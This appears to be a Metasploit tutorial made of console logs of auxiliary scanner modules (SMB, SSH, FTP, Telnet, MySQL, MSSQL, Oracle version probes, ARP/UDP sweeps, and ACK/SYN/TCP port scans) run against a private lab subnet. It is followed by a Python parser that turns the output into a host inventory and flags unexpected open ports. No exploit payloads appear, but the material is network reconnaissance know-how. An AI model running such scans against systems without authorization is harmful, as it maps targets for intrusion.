```
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
RPORT    80               yes       The target port (TCP)
SSL      false            no        Negotiate SSL/TLS for outgoing connections
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/http/http_version) > set rport 80
rport => 80
```
```
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
SMBDomain  .                no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/smb/smb_version) > exploit
[+] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[*] 192.168.1.7:445 - Host could not be identified: Windows 6.1 (Samba 4.8.3)
[*] 192.168.1.0/24:445 - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.1.0/24:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```
Discovering FTP services: use scanner/ftp/ftp_version to discover FTP services
```
msf5 > use scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options

Name     Current Setting      Required  Description
----     ---------------      --------  -----------
FTPPASS  mozilla@example.com  no        The password for the specified username
FTPUSER  anonymous            no        The username to authenticate as
RHOSTS   192.168.1.0/24       yes       The target address range or CIDR identifier
RPORT    21                   yes       The target port (TCP)
THREADS  10                   yes       The number of concurrent threads

msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10
threads => 10
```
```
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
RPORT    22               yes       The target port (TCP)
THREADS  10               yes       The number of concurrent threads
TIMEOUT  30               yes       Timeout for the SSH probe

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/ssh/ssh_version) > exploit
[+] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.0/24:22 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```
```
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD                   no        The password for the specified username
RHOSTS    192.168.1.0/24   yes       The target address range or CIDR identifier
RPORT     23               yes       The target port (TCP)
THREADS   10               yes       The number of concurrent threads
TIMEOUT   30               yes       Timeout for the Telnet probe
USERNAME                   no        The username to authenticate as

[-] 192.168.1.1:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23).
[-] 192.168.1.7:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23).
[-] 192.168.1.0:23 - A network issue has occurred: The host (192.168.1.0:23) was unreachable.
[-] 192.168.1.10:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23).
[-] 192.168.1.3:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).
[-] 192.168.1.5:23 - A network issue has occurred: The host (192.168.1.5:23) was unreachable.
[*] 192.168.1.0/24:23 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```
```
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier
RPORT    3306             yes       The target port (TCP)
THREADS  1                yes       The number of concurrent threads

[*] 192.168.1.7:3306 - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.7' is not allowed to connect to this MariaDB server
[*] 192.168.1.7:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
PASSWORD                              no        The password for the specified username
RHOSTS               192.168.1.0/24   yes       The target address range or CIDR identifier
TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
THREADS              10               yes       The number of concurrent threads
USERNAME             sa               no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10
threads => 10
```
```
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
RPORT    1521             yes       The target port (TCP)
THREADS  10               yes       The number of concurrent threads

msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/oracle/tnslsnr_version) > run
```
```
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
SHOST                       no        Source IP Address
SMAC                        no        Source MAC Address
THREADS    10               yes       The number of concurrent threads
TIMEOUT    5                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10

[+] 192.168.1.1 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.1 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```
Discovering internal hosts over UDP: use scanner/discovery/udp_sweep to discover live hosts on the internal network.
```
msf5 > use scanner/discovery/udp_sweep
msf5 auxiliary(scanner/discovery/udp_sweep) > show options

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to probe in each set
RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
THREADS    10               yes       The number of concurrent threads
```
```
msf5 > use auxiliary/scanner/portscan/ack
msf5 auxiliary(scanner/portscan/ack) > show options

Module options (auxiliary/scanner/portscan/ack):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to scan per set
DELAY      0                yes       The delay between connections, per thread, in milliseconds
INTERFACE                   no        The name of the interface
JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
SNAPLEN    65535            yes       The number of bytes to capture
THREADS    10               yes       The number of concurrent threads
TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/ack) > set threads 10
threads => 10
```
```
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to scan per set
DELAY      0                yes       The delay between connections, per thread, in milliseconds
INTERFACE                   no        The name of the interface
JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS      1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
SNAPLEN    65535            yes       The number of bytes to capture
THREADS    10               yes       The number of concurrent threads
TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/syn) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/syn) > run
```
```
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CONCURRENCY  10               yes       The number of concurrent ports to check per host
DELAY        0                yes       The delay between connections, per thread, in milliseconds
JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS       192.168.1.7      yes       The target address range or CIDR identifier
THREADS      10               yes       The number of concurrent threads
TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.7: - 192.168.1.7:21 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:22 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:80 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:139 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:445 - TCP OPEN
[*] 192.168.1.7: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
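The output of these scanner modules is line-oriented (`[+]` open-port and banner lines, `[-]` network errors, `[*]` status), so a console log from the portscan, ssh_version, smb_version and telnet_version runs above can be folded into a per-host inventory and checked against the exposure an asset owner expects. The Python below is an added example, not code from the original post or from Metasploit; the sample lines are constructed in the formats shown on this page, and the allow-list shape is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of msfconsole scanner output, copying the line formats
# printed by portscan/tcp, ssh_version, smb_version and telnet_version above.
SAMPLE_OUTPUT = """\
[+] 192.168.1.7: - 192.168.1.7:21 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:22 - TCP OPEN
[+] 192.168.1.7: - 192.168.1.7:445 - TCP OPEN
[+] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD )
[+] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[-] 192.168.1.5:23 - A network issue has occurred: The host (192.168.1.5:23) was unreachable.
[*] 192.168.1.7: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# portscan/* prints "[+] <host>: - <host>:<port> - TCP OPEN"
OPEN_RE = re.compile(r"^\[\+\] \S+ - (\d+\.\d+\.\d+\.\d+):(\d+) - TCP OPEN$")
# *_version modules print "[+] <host>:<port> - <banner or fingerprint text>"
BANNER_RE = re.compile(r"^\[\+\] (\d+\.\d+\.\d+\.\d+):(\d+) - (.+)$")
# probe failures print "[-] <host>:<port> - <error text>"
ERROR_RE = re.compile(r"^\[-\] (\d+\.\d+\.\d+\.\d+):(\d+) - (.+)$")


def parse_scanner_output(text):
    """Fold scanner lines into {host: {"open_ports": set, "services": {port: text},
    "errors": {port: text}}}; [*] status lines carry no per-host facts."""
    inv = defaultdict(lambda: {"open_ports": set(), "services": {}, "errors": {}})
    for line in text.splitlines():
        line = line.strip()
        if m := OPEN_RE.match(line):
            inv[m[1]]["open_ports"].add(int(m[2]))
        elif m := BANNER_RE.match(line):
            inv[m[1]]["services"][int(m[2])] = m[3]
        elif m := ERROR_RE.match(line):
            inv[m[1]]["errors"][int(m[2])] = m[3]
    return dict(inv)


def unexpected_exposures(inv, allowed):
    """Return sorted (host, port) pairs seen open that are absent from an
    expected-exposure allow-list of the form {host: {ports}} (assumed format)."""
    return sorted((host, port) for host, data in inv.items()
                  for port in data["open_ports"]
                  if port not in allowed.get(host, set()))


if __name__ == "__main__":
    inventory = parse_scanner_output(SAMPLE_OUTPUT)
    for host, data in sorted(inventory.items()):
        print(host, sorted(data["open_ports"]), data["services"], data["errors"])
    print("unexpected:", unexpected_exposures(inventory, {"192.168.1.7": {22}}))
```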